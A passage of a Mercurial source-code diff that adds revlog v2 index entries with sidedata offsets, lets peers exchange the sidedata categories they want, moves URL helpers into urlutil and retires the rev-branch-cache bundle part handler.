Overallocate to compensate by + # use the classic doubling technique for dynamic arrays instead. + # If there was a gap in the map before, less space will be reserved. + self._rbcrevs.extend(b'\0' * max(_rbcmininc, requiredsize)) pack_into(_rbcrecfmt, self._rbcrevs, rbcrevidx, node, branchidx) self._rbcrevslen = min(self._rbcrevslen, rev) diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -177,7 +177,10 @@ url, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -1598,7 +1601,6 @@ b'digests': tuple(sorted(util.DIGESTS.keys())), b'remote-changegroup': (b'http', b'https'), b'hgtagsfnodes': (), - b'rev-branch-cache': (), b'phases': (b'heads',), b'stream': (b'v2',), } @@ -1643,6 +1645,9 @@ # Else always advertise support on client, because payload support # should always be advertised. + # b'rev-branch-cache is no longer advertised, but still supported + # for legacy clients. + return caps @@ -1769,7 +1774,7 @@ for node in outgoing.ancestorsof: # Don't compute missing, as this may slow down serving. 
fnode = cache.getfnode(node, computemissing=False) - if fnode is not None: + if fnode: chunks.extend([node, fnode]) if chunks: @@ -1810,6 +1815,28 @@ return params +def format_remote_wanted_sidedata(repo): + """Formats a repo's wanted sidedata categories into a bytestring for + capabilities exchange.""" + wanted = b"" + if repo._wanted_sidedata: + wanted = b','.join( + pycompat.bytestr(c) for c in sorted(repo._wanted_sidedata) + ) + return wanted + + +def read_remote_wanted_sidedata(remote): + sidedata_categories = remote.capable(b'exp-wanted-sidedata') + return read_wanted_sidedata(sidedata_categories) + + +def read_wanted_sidedata(formatted): + if formatted: + return set(formatted.split(b',')) + return set() + + def addpartbundlestream2(bundler, repo, **kwargs): if not kwargs.get('stream', False): return @@ -1955,6 +1982,7 @@ b'version', b'nbchanges', b'exp-sidedata', + b'exp-wanted-sidedata', b'treemanifest', b'targetphase', ), @@ -1997,11 +2025,15 @@ targetphase = inpart.params.get(b'targetphase') if targetphase is not None: extrakwargs['targetphase'] = int(targetphase) + + remote_sidedata = inpart.params.get(b'exp-wanted-sidedata') + extrakwargs['sidedata_categories'] = read_wanted_sidedata(remote_sidedata) + ret = _processchangegroup( op, cg, tr, - b'bundle2', + op.source, b'bundle2', expectedtotal=nbchangesets, **extrakwargs @@ -2044,7 +2076,7 @@ raw_url = inpart.params[b'url'] except KeyError: raise error.Abort(_(b'remote-changegroup: missing "%s" param') % b'url') - parsed_url = util.url(raw_url) + parsed_url = urlutil.url(raw_url) if parsed_url.scheme not in capabilities[b'remote-changegroup']: raise error.Abort( _(b'remote-changegroup does not support %s urls') @@ -2081,9 +2113,9 @@ cg = exchange.readbundle(op.repo.ui, real_part, raw_url) if not isinstance(cg, changegroup.cg1unpacker): raise error.Abort( - _(b'%s: not a bundle version 1.0') % util.hidepassword(raw_url) + _(b'%s: not a bundle version 1.0') % urlutil.hidepassword(raw_url) ) - ret = 
_processchangegroup(op, cg, tr, b'bundle2', b'bundle2') + ret = _processchangegroup(op, cg, tr, op.source, b'bundle2') if op.reply is not None: # This is definitely not the final form of this # return. But one need to start somewhere. @@ -2097,7 +2129,7 @@ except error.Abort as e: raise error.Abort( _(b'bundle at %s is corrupted:\n%s') - % (util.hidepassword(raw_url), e.message) + % (urlutil.hidepassword(raw_url), e.message) ) assert not inpart.read() @@ -2117,7 +2149,7 @@ contains binary encoded (bookmark, node) tuple. If the local state does not marks the one in the part, a PushRaced exception is raised """ - bookdata = bookmarks.binarydecode(inpart) + bookdata = bookmarks.binarydecode(op.repo, inpart) msgstandard = ( b'remote repository changed while pushing - please try again ' @@ -2347,7 +2379,7 @@ When mode is 'records', the information is recorded into the 'bookmarks' records of the bundle operation. This behavior is suitable for pulling. """ - changes = bookmarks.binarydecode(inpart) + changes = bookmarks.binarydecode(op.repo, inpart) pushkeycompat = op.repo.ui.configbool( b'server', b'bookmarks-pushkey-compat' @@ -2478,35 +2510,10 @@ @parthandler(b'cache:rev-branch-cache') def handlerbc(op, inpart): - """receive a rev-branch-cache payload and update the local cache - - The payload is a series of data related to each branch - - 1) branch name length - 2) number of open heads - 3) number of closed heads - 4) open heads nodes - 5) closed heads nodes - """ - total = 0 - rawheader = inpart.read(rbcstruct.size) - cache = op.repo.revbranchcache() - cl = op.repo.unfiltered().changelog - while rawheader: - header = rbcstruct.unpack(rawheader) - total += header[1] + header[2] - utf8branch = inpart.read(header[0]) - branch = encoding.tolocal(utf8branch) - for x in pycompat.xrange(header[1]): - node = inpart.read(20) - rev = cl.rev(node) - cache.setdata(branch, rev, node, False) - for x in pycompat.xrange(header[2]): - node = inpart.read(20) - rev = cl.rev(node) - 
cache.setdata(branch, rev, node, True) - rawheader = inpart.read(rbcstruct.size) - cache.write() + """Legacy part, ignored for compatibility with bundles from or + for Mercurial before 5.7. Newer Mercurial computes the cache + efficiently enough during unbundling that the additional transfer + is unnecessary.""" @parthandler(b'pushvars') @@ -2561,8 +2568,6 @@ for r in repo.revs(b"::%ln", common): commonnodes.add(cl.node(r)) if commonnodes: - # XXX: we should only send the filelogs (and treemanifest). user - # already has the changelog and manifest packer = changegroup.getbundler( cgversion, repo, @@ -2584,5 +2589,7 @@ part.addparam(b'treemanifest', b'1') if b'exp-sidedata-flag' in repo.requirements: part.addparam(b'exp-sidedata', b'1') + wanted = format_remote_wanted_sidedata(repo) + part.addparam(b'exp-wanted-sidedata', wanted) return bundler diff --git a/mercurial/bundlecaches.py b/mercurial/bundlecaches.py --- a/mercurial/bundlecaches.py +++ b/mercurial/bundlecaches.py @@ -9,6 +9,7 @@ from . import ( error, + requirements as requirementsmod, sslutil, util, ) @@ -164,7 +165,7 @@ compression = spec version = b'v1' # Generaldelta repos require v2. - if b'generaldelta' in repo.requirements: + if requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements: version = b'v2' # Modern compression engines require v2. 
if compression not in _bundlespecv1compengines: diff --git a/mercurial/bundlerepo.py b/mercurial/bundlerepo.py --- a/mercurial/bundlerepo.py +++ b/mercurial/bundlerepo.py @@ -43,6 +43,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) class bundlerevlog(revlog.revlog): @@ -61,7 +64,7 @@ self.repotiprev = n - 1 self.bundlerevs = set() # used by 'bundle()' revset expression for deltadata in cgunpacker.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata size = len(delta) start = cgunpacker.tell() - size @@ -175,9 +178,15 @@ class bundlemanifest(bundlerevlog, manifest.manifestrevlog): def __init__( - self, opener, cgunpacker, linkmapper, dirlogstarts=None, dir=b'' + self, + nodeconstants, + opener, + cgunpacker, + linkmapper, + dirlogstarts=None, + dir=b'', ): - manifest.manifestrevlog.__init__(self, opener, tree=dir) + manifest.manifestrevlog.__init__(self, nodeconstants, opener, tree=dir) bundlerevlog.__init__( self, opener, self.indexfile, cgunpacker, linkmapper ) @@ -192,6 +201,7 @@ if d in self._dirlogstarts: self.bundle.seek(self._dirlogstarts[d]) return bundlemanifest( + self.nodeconstants, self.opener, self.bundle, self._linkmapper, @@ -368,7 +378,9 @@ # consume the header if it exists self._cgunpacker.manifestheader() linkmapper = self.unfiltered().changelog.rev - rootstore = bundlemanifest(self.svfs, self._cgunpacker, linkmapper) + rootstore = bundlemanifest( + self.nodeconstants, self.svfs, self._cgunpacker, linkmapper + ) self.filestart = self._cgunpacker.tell() return manifest.manifestlog( @@ -466,7 +478,7 @@ cwd = pathutil.normasprefix(cwd) if parentpath.startswith(cwd): parentpath = parentpath[len(cwd) :] - u = util.url(path) + u = urlutil.url(path) path = u.localpath() if u.scheme == b'bundle': s = path.split(b"+", 1) diff --git a/mercurial/cacheutil.py b/mercurial/cacheutil.py --- a/mercurial/cacheutil.py +++ b/mercurial/cacheutil.py @@ -1,6 +1,6 @@ # 
scmutil.py - Mercurial core utility functions # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/cext/bdiff.c b/mercurial/cext/bdiff.c --- a/mercurial/cext/bdiff.c +++ b/mercurial/cext/bdiff.c @@ -1,7 +1,7 @@ /* bdiff.c - efficient binary diff extension for Mercurial - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/charencode.c b/mercurial/cext/charencode.c --- a/mercurial/cext/charencode.c +++ b/mercurial/cext/charencode.c @@ -1,7 +1,7 @@ /* charencode.c - miscellaneous character encoding - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/mpatch.c b/mercurial/cext/mpatch.c --- a/mercurial/cext/mpatch.c +++ b/mercurial/cext/mpatch.c @@ -14,7 +14,7 @@ allocation of intermediate Python objects. Working memory is about 2x the total number of hunks. - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. 
diff --git a/mercurial/cext/osutil.c b/mercurial/cext/osutil.c --- a/mercurial/cext/osutil.c +++ b/mercurial/cext/osutil.c @@ -1,7 +1,7 @@ /* osutil.c - native operating system services - Copyright 2007 Matt Mackall and others + Copyright 2007 Olivia Mackall and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. @@ -119,7 +119,7 @@ static void listdir_stat_dealloc(PyObject *o) { - o->ob_type->tp_free(o); + Py_TYPE(o)->tp_free(o); } static PyObject *listdir_stat_getitem(PyObject *self, PyObject *key) diff --git a/mercurial/cext/parsers.c b/mercurial/cext/parsers.c --- a/mercurial/cext/parsers.c +++ b/mercurial/cext/parsers.c @@ -1,7 +1,7 @@ /* parsers.c - efficient content parsing - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. 
@@ -638,7 +638,7 @@ PyObject *encodedir(PyObject *self, PyObject *args); PyObject *pathencode(PyObject *self, PyObject *args); PyObject *lowerencode(PyObject *self, PyObject *args); -PyObject *parse_index2(PyObject *self, PyObject *args); +PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs); static PyMethodDef methods[] = { {"pack_dirstate", pack_dirstate, METH_VARARGS, "pack a dirstate\n"}, @@ -646,7 +646,8 @@ "create a set containing non-normal and other parent entries of given " "dirstate\n"}, {"parse_dirstate", parse_dirstate, METH_VARARGS, "parse a dirstate\n"}, - {"parse_index2", parse_index2, METH_VARARGS, "parse a revlog index\n"}, + {"parse_index2", (PyCFunction)parse_index2, METH_VARARGS | METH_KEYWORDS, + "parse a revlog index\n"}, {"isasciistr", isasciistr, METH_VARARGS, "check if an ASCII string\n"}, {"asciilower", asciilower, METH_VARARGS, "lowercase an ASCII string\n"}, {"asciiupper", asciiupper, METH_VARARGS, "uppercase an ASCII string\n"}, diff --git a/mercurial/cext/pathencode.c b/mercurial/cext/pathencode.c --- a/mercurial/cext/pathencode.c +++ b/mercurial/cext/pathencode.c @@ -21,6 +21,7 @@ #include <ctype.h> #include <stdlib.h> #include <string.h> +#include "pythoncapi_compat.h" #include "util.h" @@ -678,7 +679,7 @@ } assert(PyBytes_Check(ret)); - Py_SIZE(ret) = destlen; + Py_SET_SIZE(ret, destlen); return ret; } diff --git a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -1,7 +1,7 @@ /* parsers.c - efficient content parsing - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. 
@@ -15,6 +15,7 @@ #include <stddef.h> #include <stdlib.h> #include <string.h> +#include <structmember.h> #include "bitmanipulation.h" #include "charencode.h" @@ -98,6 +99,7 @@ int ntlookups; /* # lookups */ int ntmisses; /* # lookups that miss the cache */ int inlined; + long hdrsize; /* size of index headers. Differs in v1 v.s. v2 format */ }; static Py_ssize_t index_length(const indexObject *self) @@ -113,14 +115,19 @@ static int index_find_node(indexObject *self, const char *node); #if LONG_MAX == 0x7fffffffL -static const char *const tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#"); +static const char *const v1_tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#"); +static const char *const v2_tuple_format = PY23("Kiiiiiis#Ki", "Kiiiiiiy#Ki"); #else -static const char *const tuple_format = PY23("kiiiiiis#", "kiiiiiiy#"); +static const char *const v1_tuple_format = PY23("kiiiiiis#", "kiiiiiiy#"); +static const char *const v2_tuple_format = PY23("kiiiiiis#ki", "kiiiiiiy#ki"); #endif /* A RevlogNG v1 index entry is 64 bytes long. */ static const long v1_hdrsize = 64; +/* A Revlogv2 index entry is 96 bytes long. 
*/ +static const long v2_hdrsize = 96; + static void raise_revlog_error(void) { PyObject *mod = NULL, *dict = NULL, *errclass = NULL; @@ -157,7 +164,7 @@ static const char *index_deref(indexObject *self, Py_ssize_t pos) { if (pos >= self->length) - return self->added + (pos - self->length) * v1_hdrsize; + return self->added + (pos - self->length) * self->hdrsize; if (self->inlined && pos > 0) { if (self->offsets == NULL) { @@ -174,7 +181,7 @@ return self->offsets[pos]; } - return (const char *)(self->buf.buf) + pos * v1_hdrsize; + return (const char *)(self->buf.buf) + pos * self->hdrsize; } /* @@ -280,8 +287,9 @@ */ static PyObject *index_get(indexObject *self, Py_ssize_t pos) { - uint64_t offset_flags; - int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2; + uint64_t offset_flags, sidedata_offset; + int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2, + sidedata_comp_len; const char *c_node_id; const char *data; Py_ssize_t length = index_length(self); @@ -320,9 +328,19 @@ parent_2 = getbe32(data + 28); c_node_id = data + 32; - return Py_BuildValue(tuple_format, offset_flags, comp_len, uncomp_len, - base_rev, link_rev, parent_1, parent_2, c_node_id, - self->nodelen); + if (self->hdrsize == v1_hdrsize) { + return Py_BuildValue(v1_tuple_format, offset_flags, comp_len, + uncomp_len, base_rev, link_rev, parent_1, + parent_2, c_node_id, self->nodelen); + } else { + sidedata_offset = getbe64(data + 64); + sidedata_comp_len = getbe32(data + 72); + + return Py_BuildValue(v2_tuple_format, offset_flags, comp_len, + uncomp_len, base_rev, link_rev, parent_1, + parent_2, c_node_id, self->nodelen, + sidedata_offset, sidedata_comp_len); + } } /* @@ -373,18 +391,31 @@ static PyObject *index_append(indexObject *self, PyObject *obj) { - uint64_t offset_flags; + uint64_t offset_flags, sidedata_offset; int rev, comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2; - Py_ssize_t c_node_id_len; + Py_ssize_t c_node_id_len, sidedata_comp_len; const char 
*c_node_id; char *data; - if (!PyArg_ParseTuple(obj, tuple_format, &offset_flags, &comp_len, - &uncomp_len, &base_rev, &link_rev, &parent_1, - &parent_2, &c_node_id, &c_node_id_len)) { - PyErr_SetString(PyExc_TypeError, "8-tuple required"); - return NULL; + if (self->hdrsize == v1_hdrsize) { + if (!PyArg_ParseTuple(obj, v1_tuple_format, &offset_flags, + &comp_len, &uncomp_len, &base_rev, + &link_rev, &parent_1, &parent_2, + &c_node_id, &c_node_id_len)) { + PyErr_SetString(PyExc_TypeError, "8-tuple required"); + return NULL; + } + } else { + if (!PyArg_ParseTuple(obj, v2_tuple_format, &offset_flags, + &comp_len, &uncomp_len, &base_rev, + &link_rev, &parent_1, &parent_2, + &c_node_id, &c_node_id_len, + &sidedata_offset, &sidedata_comp_len)) { + PyErr_SetString(PyExc_TypeError, "10-tuple required"); + return NULL; + } } + if (c_node_id_len != self->nodelen) { PyErr_SetString(PyExc_TypeError, "invalid node"); return NULL; @@ -393,15 +424,15 @@ if (self->new_length == self->added_length) { size_t new_added_length = self->added_length ? 
self->added_length * 2 : 4096; - void *new_added = - PyMem_Realloc(self->added, new_added_length * v1_hdrsize); + void *new_added = PyMem_Realloc(self->added, new_added_length * + self->hdrsize); if (!new_added) return PyErr_NoMemory(); self->added = new_added; self->added_length = new_added_length; } rev = self->length + self->new_length; - data = self->added + v1_hdrsize * self->new_length++; + data = self->added + self->hdrsize * self->new_length++; putbe32(offset_flags >> 32, data); putbe32(offset_flags & 0xffffffffU, data + 4); putbe32(comp_len, data + 8); @@ -411,7 +442,14 @@ putbe32(parent_1, data + 24); putbe32(parent_2, data + 28); memcpy(data + 32, c_node_id, c_node_id_len); + /* Padding since SHA-1 is only 20 bytes for now */ memset(data + 32 + c_node_id_len, 0, 32 - c_node_id_len); + if (self->hdrsize != v1_hdrsize) { + putbe64(sidedata_offset, data + 64); + putbe32(sidedata_comp_len, data + 72); + /* Padding for 96 bytes alignment */ + memset(data + 76, 0, self->hdrsize - 76); + } if (self->ntinitialized) nt_insert(&self->nt, c_node_id, rev); @@ -420,6 +458,56 @@ Py_RETURN_NONE; } +/* Replace an existing index entry's sidedata offset and length with new ones. + This cannot be used outside of the context of sidedata rewriting, + inside the transaction that creates the given revision. */ +static PyObject *index_replace_sidedata_info(indexObject *self, PyObject *args) +{ + uint64_t sidedata_offset; + int rev; + Py_ssize_t sidedata_comp_len; + char *data; +#if LONG_MAX == 0x7fffffffL + const char *const sidedata_format = PY23("nKi", "nKi"); +#else + const char *const sidedata_format = PY23("nki", "nki"); +#endif + + if (self->hdrsize == v1_hdrsize || self->inlined) { + /* + There is a bug in the transaction handling when going from an + inline revlog to a separate index and data file. Turn it off until + it's fixed, since v2 revlogs sometimes get rewritten on exchange. + See issue6485. 
+ */ + raise_revlog_error(); + return NULL; + } + + if (!PyArg_ParseTuple(args, sidedata_format, &rev, &sidedata_offset, + &sidedata_comp_len)) + return NULL; + + if (rev < 0 || rev >= index_length(self)) { + PyErr_SetString(PyExc_IndexError, "revision outside index"); + return NULL; + } + if (rev < self->length) { + PyErr_SetString( + PyExc_IndexError, + "cannot rewrite entries outside of this transaction"); + return NULL; + } + + /* Find the newly added node, offset from the "already on-disk" length + */ + data = self->added + self->hdrsize * (rev - self->length); + putbe64(sidedata_offset, data + 64); + putbe32(sidedata_comp_len, data + 72); + + Py_RETURN_NONE; +} + static PyObject *index_stats(indexObject *self) { PyObject *obj = PyDict_New(); @@ -2563,14 +2651,17 @@ const char *data = (const char *)self->buf.buf; Py_ssize_t pos = 0; Py_ssize_t end = self->buf.len; - long incr = v1_hdrsize; + long incr = self->hdrsize; Py_ssize_t len = 0; - while (pos + v1_hdrsize <= end && pos >= 0) { - uint32_t comp_len; + while (pos + self->hdrsize <= end && pos >= 0) { + uint32_t comp_len, sidedata_comp_len = 0; /* 3rd element of header is length of compressed inline data */ comp_len = getbe32(data + pos + 8); - incr = v1_hdrsize + comp_len; + if (self->hdrsize == v2_hdrsize) { + sidedata_comp_len = getbe32(data + pos + 72); + } + incr = self->hdrsize + comp_len + sidedata_comp_len; if (offsets) offsets[len] = data + pos; len++; @@ -2586,11 +2677,13 @@ return len; } -static int index_init(indexObject *self, PyObject *args) +static int index_init(indexObject *self, PyObject *args, PyObject *kwargs) { - PyObject *data_obj, *inlined_obj; + PyObject *data_obj, *inlined_obj, *revlogv2; Py_ssize_t size; + static char *kwlist[] = {"data", "inlined", "revlogv2", NULL}; + /* Initialize before argument-checking to avoid index_dealloc() crash. 
*/ self->added = NULL; @@ -2606,7 +2699,9 @@ self->nodelen = 20; self->nullentry = NULL; - if (!PyArg_ParseTuple(args, "OO", &data_obj, &inlined_obj)) + revlogv2 = NULL; + if (!PyArg_ParseTupleAndKeywords(args, kwargs, "OO|O", kwlist, + &data_obj, &inlined_obj, &revlogv2)) return -1; if (!PyObject_CheckBuffer(data_obj)) { PyErr_SetString(PyExc_TypeError, @@ -2618,8 +2713,22 @@ return -1; } - self->nullentry = Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, - -1, -1, -1, -1, nullid, self->nodelen); + if (revlogv2 && PyObject_IsTrue(revlogv2)) { + self->hdrsize = v2_hdrsize; + } else { + self->hdrsize = v1_hdrsize; + } + + if (self->hdrsize == v1_hdrsize) { + self->nullentry = + Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, -1, + -1, -1, -1, nullid, self->nodelen); + } else { + self->nullentry = + Py_BuildValue(PY23("iiiiiiis#ii", "iiiiiiiy#ii"), 0, 0, 0, + -1, -1, -1, -1, nullid, self->nodelen, 0, 0); + } + if (!self->nullentry) return -1; PyObject_GC_UnTrack(self->nullentry); @@ -2641,11 +2750,11 @@ goto bail; self->length = len; } else { - if (size % v1_hdrsize) { + if (size % self->hdrsize) { PyErr_SetString(PyExc_ValueError, "corrupt index file"); goto bail; } - self->length = size / v1_hdrsize; + self->length = size / self->hdrsize; } return 0; @@ -2730,6 +2839,8 @@ "compute phases"}, {"reachableroots2", (PyCFunction)reachableroots2, METH_VARARGS, "reachableroots"}, + {"replace_sidedata_info", (PyCFunction)index_replace_sidedata_info, + METH_VARARGS, "replace an existing index entry with a new value"}, {"headrevs", (PyCFunction)index_headrevs, METH_VARARGS, "get head revisions"}, /* Can do filtering since 3.2 */ {"headrevsfiltered", (PyCFunction)index_headrevs, METH_VARARGS, @@ -2756,6 +2867,12 @@ {NULL} /* Sentinel */ }; +static PyMemberDef index_members[] = { + {"entry_size", T_LONG, offsetof(indexObject, hdrsize), 0, + "size of an index entry"}, + {NULL} /* Sentinel */ +}; + PyTypeObject HgRevlogIndex_Type = { PyVarObject_HEAD_INIT(NULL, 0) 
/* header */ "parsers.index", /* tp_name */ @@ -2785,7 +2902,7 @@ 0, /* tp_iter */ 0, /* tp_iternext */ index_methods, /* tp_methods */ - 0, /* tp_members */ + index_members, /* tp_members */ index_getset, /* tp_getset */ 0, /* tp_base */ 0, /* tp_dict */ @@ -2797,16 +2914,16 @@ }; /* - * returns a tuple of the form (index, index, cache) with elements as + * returns a tuple of the form (index, cache) with elements as * follows: * - * index: an index object that lazily parses RevlogNG records + * index: an index object that lazily parses Revlog (v1 or v2) records * cache: if data is inlined, a tuple (0, index_file_content), else None * index_file_content could be a string, or a buffer * * added complications are for backwards compatibility */ -PyObject *parse_index2(PyObject *self, PyObject *args) +PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs) { PyObject *cache = NULL; indexObject *idx; @@ -2816,7 +2933,7 @@ if (idx == NULL) goto bail; - ret = index_init(idx, args); + ret = index_init(idx, args, kwargs); if (ret == -1) goto bail; diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -1,12 +1,13 @@ # changegroup.py - Mercurial changegroup manipulation functions # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
from __future__ import absolute_import +import collections import os import struct import weakref @@ -32,6 +33,7 @@ ) from .interfaces import repository +from .revlogutils import sidedata as sidedatamod _CHANGEGROUPV1_DELTA_HEADER = struct.Struct(b"20s20s20s20s") _CHANGEGROUPV2_DELTA_HEADER = struct.Struct(b"20s20s20s20s20s") @@ -202,7 +204,9 @@ header = self.deltaheader.unpack(headerdata) delta = readexactly(self._stream, l - self.deltaheadersize) node, p1, p2, deltabase, cs, flags = self._deltaheader(header, prevnode) - return (node, p1, p2, cs, deltabase, delta, flags) + # cg4 forward-compat + sidedata = {} + return (node, p1, p2, cs, deltabase, delta, flags, sidedata) def getchunks(self): """returns all the chunks contains in the bundle @@ -249,7 +253,7 @@ pos = next yield closechunk() - def _unpackmanifests(self, repo, revmap, trp, prog): + def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None): self.callback = prog.increment # no need to check for empty manifest group here: # if the result of the merge of 1 and 2 is the same in 3 and 4, @@ -257,7 +261,8 @@ # be empty during the pull self.manifestheader() deltas = self.deltaiter() - repo.manifestlog.getstorage(b'').addgroup(deltas, revmap, trp) + storage = repo.manifestlog.getstorage(b'') + storage.addgroup(deltas, revmap, trp, addrevisioncb=addrevisioncb) prog.complete() self.callback = None @@ -269,6 +274,7 @@ url, targetphase=phases.draft, expectedtotal=None, + sidedata_categories=None, ): """Add the changegroup returned by source.read() to this repo. srctype is a string like 'push', 'pull', or 'unbundle'. url is @@ -279,9 +285,23 @@ - more heads than before: 1+added heads (2..n) - fewer heads than before: -1-removed heads (-2..-n) - number of heads stays the same: 1 + + `sidedata_categories` is an optional set of the remote's sidedata wanted + categories. """ repo = repo.unfiltered() + # Only useful if we're adding sidedata categories. 
If both peers have + # the same categories, then we simply don't do anything. + if self.version == b'04' and srctype == b'pull': + sidedata_helpers = get_sidedata_helpers( + repo, + sidedata_categories or set(), + pull=True, + ) + else: + sidedata_helpers = None + def csmap(x): repo.ui.debug(b"add changeset %s\n" % short(x)) return len(cl) @@ -316,14 +336,16 @@ self.callback = progress.increment efilesset = set() - cgnodes = [] + duprevs = [] - def ondupchangelog(cl, node): - if cl.rev(node) < clstart: - cgnodes.append(node) + def ondupchangelog(cl, rev): + if rev < clstart: + duprevs.append(rev) - def onchangelog(cl, node): - efilesset.update(cl.readfiles(node)) + def onchangelog(cl, rev): + ctx = cl.changelogrevision(rev) + efilesset.update(ctx.files) + repo.register_changeset(rev, ctx) self.changelogheader() deltas = self.deltaiter() @@ -331,6 +353,7 @@ deltas, csmap, trp, + alwayscache=True, addrevisioncb=onchangelog, duplicaterevisioncb=ondupchangelog, ): @@ -348,6 +371,13 @@ efilesset = None self.callback = None + # Keep track of the (non-changelog) revlogs we've updated and their + # range of new revisions for sidedata rewrite. + # TODO do something more efficient than keeping the reference to + # the revlogs, especially memory-wise. 
+ touched_manifests = {} + touched_filelogs = {} + # pull off the manifest group repo.ui.status(_(b"adding manifests\n")) # We know that we'll never have more manifests than we had @@ -355,7 +385,24 @@ progress = repo.ui.makeprogress( _(b'manifests'), unit=_(b'chunks'), total=changesets ) - self._unpackmanifests(repo, revmap, trp, progress) + on_manifest_rev = None + if sidedata_helpers and b'manifest' in sidedata_helpers[1]: + + def on_manifest_rev(manifest, rev): + range = touched_manifests.get(manifest) + if not range: + touched_manifests[manifest] = (rev, rev) + else: + assert rev == range[1] + 1 + touched_manifests[manifest] = (range[0], rev) + + self._unpackmanifests( + repo, + revmap, + trp, + progress, + addrevisioncb=on_manifest_rev, + ) needfiles = {} if repo.ui.configbool(b'server', b'validate'): @@ -369,12 +416,37 @@ for f, n in pycompat.iteritems(mfest): needfiles.setdefault(f, set()).add(n) + on_filelog_rev = None + if sidedata_helpers and b'filelog' in sidedata_helpers[1]: + + def on_filelog_rev(filelog, rev): + range = touched_filelogs.get(filelog) + if not range: + touched_filelogs[filelog] = (rev, rev) + else: + assert rev == range[1] + 1 + touched_filelogs[filelog] = (range[0], rev) + # process the files repo.ui.status(_(b"adding file changes\n")) newrevs, newfiles = _addchangegroupfiles( - repo, self, revmap, trp, efiles, needfiles + repo, + self, + revmap, + trp, + efiles, + needfiles, + addrevisioncb=on_filelog_rev, ) + if sidedata_helpers: + if b'changelog' in sidedata_helpers[1]: + cl.rewrite_sidedata(sidedata_helpers, clstart, clend - 1) + for mf, (startrev, endrev) in touched_manifests.items(): + mf.rewrite_sidedata(sidedata_helpers, startrev, endrev) + for fl, (startrev, endrev) in touched_filelogs.items(): + fl.rewrite_sidedata(sidedata_helpers, startrev, endrev) + # making sure the value exists tr.changes.setdefault(b'changegroup-count-changesets', 0) tr.changes.setdefault(b'changegroup-count-revisions', 0) @@ -445,8 +517,12 @@ if 
added: phases.registernew(repo, tr, targetphase, added) if phaseall is not None: - phases.advanceboundary(repo, tr, phaseall, cgnodes, revs=added) - cgnodes = [] + if duprevs: + duprevs.extend(added) + else: + duprevs = added + phases.advanceboundary(repo, tr, phaseall, [], revs=duprevs) + duprevs = [] if changesets > 0: @@ -494,7 +570,7 @@ """ chain = None for chunkdata in iter(lambda: self.deltachunk(chain), {}): - # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags) + # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags, sidedata) yield chunkdata chain = chunkdata[0] @@ -534,17 +610,44 @@ node, p1, p2, deltabase, cs, flags = headertuple return node, p1, p2, deltabase, cs, flags - def _unpackmanifests(self, repo, revmap, trp, prog): - super(cg3unpacker, self)._unpackmanifests(repo, revmap, trp, prog) + def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None): + super(cg3unpacker, self)._unpackmanifests( + repo, revmap, trp, prog, addrevisioncb=addrevisioncb + ) for chunkdata in iter(self.filelogheader, {}): # If we get here, there are directory manifests in the changegroup d = chunkdata[b"filename"] repo.ui.debug(b"adding %s revisions\n" % d) deltas = self.deltaiter() - if not repo.manifestlog.getstorage(d).addgroup(deltas, revmap, trp): + if not repo.manifestlog.getstorage(d).addgroup( + deltas, revmap, trp, addrevisioncb=addrevisioncb + ): raise error.Abort(_(b"received dir revlog group is empty")) +class cg4unpacker(cg3unpacker): + """Unpacker for cg4 streams. + + cg4 streams add support for exchanging sidedata. 
